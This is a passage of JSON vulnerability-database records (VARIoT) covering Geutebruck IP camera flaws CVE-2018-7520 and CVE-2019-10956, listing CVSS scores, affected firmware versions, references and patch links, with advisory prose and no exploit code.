                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137552",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7520",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-7520",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7520",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7520",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06020",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-764",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137552",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-137552",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7520",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E8F6E2-39AB-11E9-B0E9-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "148380",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "id": "VAR-201803-2213",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.617000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCameras patch for incorrect access control vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122845"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for access control error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79350"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-284",
            "trust": 1.9
          },
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7520"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7520"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "date": "2018-03-22T18:29:00.963000",
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "date": "2020-10-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "date": "2020-10-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "date": "2024-11-21T04:12:17.273000",
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Incorrect access control vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1487

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. Geutebruck IP Camera G-Code and G-Cam In OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1487",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2241",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2400",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2111_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2241_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2230_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2239_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2249_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-code_eec-2400_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10956",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2019-10956",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-22346",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2019-10956",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-10956",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10956",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10956",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22346",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-088",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-10956",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
